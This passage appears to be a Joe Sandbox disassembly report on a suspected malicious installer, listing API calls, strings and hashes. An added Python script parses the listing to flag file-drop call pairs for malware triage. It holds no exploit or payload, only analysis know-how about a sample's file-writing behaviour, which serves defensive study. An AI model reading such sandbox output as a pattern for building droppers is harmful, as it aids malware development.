                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressEnvironmentFreeLoadProcVariable
                                                                                                                        • String ID: AI_BOOTSTRAPPERLANGS$APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFilesFolder$Shell32.dll$Shlwapi.dll
                                                                                                                        • API String ID: 788177547-1020860216
                                                                                                                        • Opcode ID: 15b05af7d7b201b97de97fd1596b598c434ff3edb4a79fe6d5e3dac7fe0cc687
                                                                                                                        • Instruction ID: 456f3cfe39c577288e0670a61e85709bf5f4eef7646135f6c3c02211fd7cea5e
                                                                                                                        • Opcode Fuzzy Hash: 15b05af7d7b201b97de97fd1596b598c434ff3edb4a79fe6d5e3dac7fe0cc687
                                                                                                                        • Instruction Fuzzy Hash: 159105726016059FDB24DF24C845BBAB3B9FF65314F1485ADE80ADB295EB31EE41CB80
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000043A,00000000,00000074), ref: 008747D5
                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000020), ref: 0087484B
                                                                                                                        • GetDC.USER32(?), ref: 0087486E
                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00874875
                                                                                                                        • MulDiv.KERNEL32(?,00000048,00000000), ref: 00874888
                                                                                                                        • SendMessageW.USER32(?,00000444,00000000,00000074), ref: 008748BA
                                                                                                                        • DeleteObject.GDI32(?), ref: 008748F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CapsDeleteDeviceObjectlstrcpyn
                                                                                                                        • String ID: ?$t
                                                                                                                        • API String ID: 2619291461-1995845436
                                                                                                                        • Opcode ID: 01545f600c50bb374d1f16153cf371432e8a66d75de4aeabad0fb4eef670fdee
                                                                                                                        • Instruction ID: 1b971786eae9fe85f6a7f72aa2bf0b1693373103eddea4f78edeff4149ea0192
                                                                                                                        • Opcode Fuzzy Hash: 01545f600c50bb374d1f16153cf371432e8a66d75de4aeabad0fb4eef670fdee
                                                                                                                        • Instruction Fuzzy Hash: 68517B71908341AFE731DF60D949BABBBE8FB48701F00492EF699C6191DB74E509CB52
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00B3683C,C7BA013E,00000000,?,?,?,?,?,?,00855ABE,00A413ED,000000FF), ref: 008562CD
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00856348
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 008563EE
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 00856443
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalCursorLoadSection$EnterLeave
                                                                                                                        • String ID: v$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                        • API String ID: 3727441302-4127849342
                                                                                                                        • Opcode ID: a163340dd50acd0ac50f77e0f06ef45151a99782709708755354c1f80045e539
                                                                                                                        • Instruction ID: 9ffa5828bdcffea9f0e760d91bc66c87fd24efa10edba169fe5dd2cde6203ac1
                                                                                                                        • Opcode Fuzzy Hash: a163340dd50acd0ac50f77e0f06ef45151a99782709708755354c1f80045e539
                                                                                                                        • Instruction Fuzzy Hash: 3B512CB1D00219EFDB11DF94D848BEEBBF8FB08714F50016AE814F7280EBB555098B94
                                                                                                                        APIs
                                                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 0098A38C
                                                                                                                        • GetUserDefaultLangID.KERNEL32 ref: 0098A399
                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 0098A3AB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 0098A3BF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0098A3D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDefaultLangProc$LibraryLoadSystemUser
                                                                                                                        • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
                                                                                                                        • API String ID: 667524283-3528650308
                                                                                                                        • Opcode ID: 9af9e357018a248aa2ce335dc426b4cb436f5da990a122bb4f33ee574661c38c
                                                                                                                        • Instruction ID: 10982553e045b81d5bd12cd69f09a2e1dd9686d5e55cfc6d91c72610082c7ea8
                                                                                                                        • Opcode Fuzzy Hash: 9af9e357018a248aa2ce335dc426b4cb436f5da990a122bb4f33ee574661c38c
                                                                                                                        • Instruction Fuzzy Hash: 2A41AA306043119FEB54EF28E85467AB7E6EBE8310F91092EE885C32A0EB74C945CB52
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00A19B47
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00A19B4F
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00A19BD8
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00A19C03
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00A19C58
                                                                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00A19C6E
                                                                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00A19C83
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1385549066-1018135373
                                                                                                                        • Opcode ID: 1cb5935ef1444a89d5eb9b41420ca1629b450ee9766e16e7771cb8fd7c3fc9bf
                                                                                                                        • Instruction ID: 5410baf36072f518d7e30f43e32e0709114073d17c7929d1cb76c9d7e61a4419
                                                                                                                        • Opcode Fuzzy Hash: 1cb5935ef1444a89d5eb9b41420ca1629b450ee9766e16e7771cb8fd7c3fc9bf
                                                                                                                        • Instruction Fuzzy Hash: E3410234A082189FCF10DF68D9A0AEFBBF5EF45324F148095E8195B392C7319A86CB91
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000), ref: 009476DF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00947707
                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 00947749
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0094779E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseFileHandle$CreateWrite
                                                                                                                        • String ID: .bat$EXE$open
                                                                                                                        • API String ID: 3602564925-2898749727
                                                                                                                        • Opcode ID: a6e915b4c43f8d5c5a3034318a34fe4dd6ea1688ac0afe659f4d758e0c9516c3
                                                                                                                        • Instruction ID: 3425076443a922360f14fb525d7bf18854bc8418eb3e03225e4eab9457396e61
                                                                                                                        • Opcode Fuzzy Hash: a6e915b4c43f8d5c5a3034318a34fe4dd6ea1688ac0afe659f4d758e0c9516c3
                                                                                                                        • Instruction Fuzzy Hash: 60A17970905648EFEB10CFA8CD48B9DFBB8FF45314F2482A9E415AB291DB709D05CB61
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(0000000E,C7BA013E,?,?,00000000,?), ref: 008598FE
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0085993F
                                                                                                                        • EnterCriticalSection.KERNEL32(00B3683C), ref: 0085995F
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 00859983
                                                                                                                        • CreateWindowExW.USER32(00000000,00000000,00000000,00B3683C,?,80000000,00000000,80000000,00000000,00000000,00000000), ref: 008599DE
                                                                                                                          • Part of subcall function 00A15943: GetProcessHeap.KERNEL32(00000008,00000008,00000000,0098AB8E,?,?,?,?,?,?), ref: 00A15948
                                                                                                                          • Part of subcall function 00A15943: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A1594F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
                                                                                                                        • String ID: v$AXWIN UI Window
                                                                                                                        • API String ID: 213679520-2690018532
                                                                                                                        • Opcode ID: bdf6564f0da66db85bb72128a13a6628557f8abedd3e2421bd126cb813e1b56f
                                                                                                                        • Instruction ID: 9646f773b2b00547a95c6771f2a9ec2d6d745d74565c2edc3100420b8858ce4d
                                                                                                                        • Opcode Fuzzy Hash: bdf6564f0da66db85bb72128a13a6628557f8abedd3e2421bd126cb813e1b56f
                                                                                                                        • Instruction Fuzzy Hash: 0A51C335A00205EFDB10CF68DD05B9ABBF8FB88715F10816AFD44E7290E771A915CBA1
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0085D9FF
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,C7BA0140), ref: 0085DA53
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0085DAB0
                                                                                                                          • Part of subcall function 00A162A2: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162AD
                                                                                                                          • Part of subcall function 00A162A2: LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162EA
                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0085DB17
                                                                                                                        • CloseHandle.KERNEL32(00000000,00A1301E), ref: 0085DB3D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
                                                                                                                        • String ID: aix$html
                                                                                                                        • API String ID: 2030708724-2369804267
                                                                                                                        • Opcode ID: 1c0a66484ed02fcf9ba498d76665ef97920b121f28a1ca38f97fd4f3125f1317
                                                                                                                        • Instruction ID: f16c684a1dd2d186544fa1c7385b4a363cf9574744db98c627f247a583c2d0aa
                                                                                                                        • Opcode Fuzzy Hash: 1c0a66484ed02fcf9ba498d76665ef97920b121f28a1ca38f97fd4f3125f1317
                                                                                                                        • Instruction Fuzzy Hash: 6261C2B0900348EFDB10DFA4CD49B9EBBF4FB59708F24811EE401AB291DBB56949CB61
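The two function blocks above (call sites 009476DF and 0085DA53) both show the same primitive: CreateFileW opened with dwDesiredAccess 40000000 (GENERIC_WRITE) and dwCreationDisposition 00000002 (CREATE_ALWAYS), followed by WriteFile, i.e. a file being dropped or overwritten. When triaging many Joe Sandbox function listings it helps to pull these pairs out mechanically rather than by eye. The following is an added example, not part of the Joe Sandbox report or its IDA plugin output: a small Python parser for the "• API.MODULE(args), ref: ADDR" lines, with a decoder for the static CreateFileW arguments. It assumes the listed values are the call's stack slots in parameter order (the listing shows more values than CreateFileW takes, so only the first seven are read and the rest are treated as spill), that "?" marks a value the analyser could not recover statically, and that the sample lines embedded below are copied verbatim from the two blocks above.

```python
import re
from dataclasses import dataclass

# Constructed sample: the "APIs" lines of the two file-writing functions above,
# copied as they appear in the report (call sites 009476DF and 0085DA53).
SAMPLE = """\
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000), ref: 009476DF
• CloseHandle.KERNEL32(00000000), ref: 00947707
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 00947749
• CloseHandle.KERNEL32(?), ref: 0094779E
• CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,C7BA0140), ref: 0085DA53
• WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0085DB17
"""

# Matches "Api.MODULE(arg,arg,...), ref: ADDR" and the paren-less form
# "Api.MODULE ref: ADDR"; search() lets the "Part of subcall function" prefix through.
LINE_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")

# Win32 constants for the CreateFileW parameters we decode.
ACCESS_BITS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_BITS = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


@dataclass
class ApiRef:
    api: str
    module: str
    args: list   # raw stack-slot tokens; "?" means not statically recoverable
    ref: int     # call-site address


def parse_api_refs(text):
    """Parse every API reference line in a function block into ApiRef records."""
    refs = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        api, module, raw_args, ref = m.groups()
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        refs.append(ApiRef(api, module, args, int(ref, 16)))
    return refs


def _hex(tok):
    """Hex token -> int, or None for "?" and symbolic tokens such as SetWindowTheme."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else None


def decode_createfile(ref):
    """Symbolic names for the static CreateFileW arguments (first seven stack slots)."""
    if ref.api != "CreateFileW" or len(ref.args) < 7:
        return None
    access, share, disp = (_hex(ref.args[i]) for i in (1, 2, 4))
    return {
        "access": [n for b, n in ACCESS_BITS.items() if access is not None and access & b],
        "share": [n for b, n in SHARE_BITS.items() if share is not None and share & b],
        "disposition": DISPOSITION.get(disp, "?"),
    }


def find_file_drop_primitives(refs):
    """Pair each CreateFileW that creates/overwrites a file for writing with the
    next WriteFile in call order; returns (createfile_addr, writefile_addr) pairs."""
    drops = []
    for i, r in enumerate(refs):
        d = decode_createfile(r)
        if not d or "GENERIC_WRITE" not in d["access"] or d["disposition"] != "CREATE_ALWAYS":
            continue
        nxt = next((w for w in refs[i + 1:] if w.api == "WriteFile"), None)
        if nxt is not None:
            drops.append((f"{r.ref:08X}", f"{nxt.ref:08X}"))
    return drops


if __name__ == "__main__":
    for cf, wf in find_file_drop_primitives(parse_api_refs(SAMPLE)):
        print(f"file drop: CreateFileW@{cf} -> WriteFile@{wf}")
```

The pairing is by call order within one block, which is what the report gives; it does not prove the two handles are the same, so treat a hit as a triage lead and confirm in the disassembly. The second CreateFileW also passes dwShareMode 00000001 (FILE_SHARE_READ), which the decoder surfaces and which is a useful discriminator when clustering similar droppers.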
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00B3150C,00000000,C7BA013E,00000000,00A7B2C3,000000FF,?,C7BA013E), ref: 00842853
                                                                                                                        • GetLastError.KERNEL32(?,C7BA013E), ref: 0084285D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                                        • String ID: VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
                                                                                                                        • API String ID: 439134102-34576578
                                                                                                                        • Opcode ID: 01454217ac514709648c379aeb1fad8a72fa72df8ef65717e121f52abe53a413
                                                                                                                        • Instruction ID: e76bff7fdebc2613f29d42690051e94319eef1df8a443582d0d3a037a68533ea
                                                                                                                        • Opcode Fuzzy Hash: 01454217ac514709648c379aeb1fad8a72fa72df8ef65717e121f52abe53a413
                                                                                                                        • Instruction Fuzzy Hash: 2251D1B1904209DBCB00CFA8DD05BDEBBF8FB48324F204A69E815E7391EB7599048F91
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: RectWindow$Client
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3228027793-0
                                                                                                                        • Opcode ID: 15eb5c6abac51fff40137602ea3b44a2afb72497d976b5546d9c18dbced40d1a
                                                                                                                        • Instruction ID: f92a6dd29f12606a75452499156c1ebc42ee1282b4a190b494b05d47af55ebb9
                                                                                                                        • Opcode Fuzzy Hash: 15eb5c6abac51fff40137602ea3b44a2afb72497d976b5546d9c18dbced40d1a
                                                                                                                        • Instruction Fuzzy Hash: 96E10771D01219AFDB21CFA8C944BAEBBF8FF09710F254269E809E7251DB706A45CF51
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0093F2F0
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        • GetProcAddress.KERNEL32(SetWindowTheme), ref: 0093F32D
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0093F344
                                                                                                                        • SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 0093F36F
                                                                                                                          • Part of subcall function 00A162A2: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162AD
                                                                                                                          • Part of subcall function 00A162A2: LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162EA
                                                                                                                          • Part of subcall function 0091D900: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0091D941
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionDirectoryMessageProcSendSystemVariableWake
                                                                                                                        • String ID: SetWindowTheme$UxTheme.dll$explorer
                                                                                                                        • API String ID: 3410024541-3123591815
                                                                                                                        • Opcode ID: 4b38a4faa2e6c0f73842c2cafedc28109f7739c364e5e2c05f138cddd9c6276a
                                                                                                                        • Instruction ID: 88669d7367ee2f9dd1ca49508a35aa7c0fab2d15d19592134aba0e4b9ced6a9f
                                                                                                                        • Opcode Fuzzy Hash: 4b38a4faa2e6c0f73842c2cafedc28109f7739c364e5e2c05f138cddd9c6276a
                                                                                                                        • Instruction Fuzzy Hash: F8218071A80600FBCB21DF54DD13B8EF7A8EB15B20F208225E924D72E1EBB5A9408F51
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001036,00010000,00000000), ref: 0093F09B
                                                                                                                        • GetParent.USER32(00000000), ref: 0093F0EE
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0093F0F1
                                                                                                                        • GetParent.USER32(00000000), ref: 0093F100
                                                                                                                        • GetDC.USER32(00000000), ref: 0093F103
                                                                                                                          • Part of subcall function 008F8E20: GetWindowRect.USER32(?,?), ref: 008F8EB2
                                                                                                                          • Part of subcall function 008F8E20: GetWindowRect.USER32(?,?), ref: 008F8ECA
                                                                                                                        • DeleteDC.GDI32(?), ref: 0093F1CC
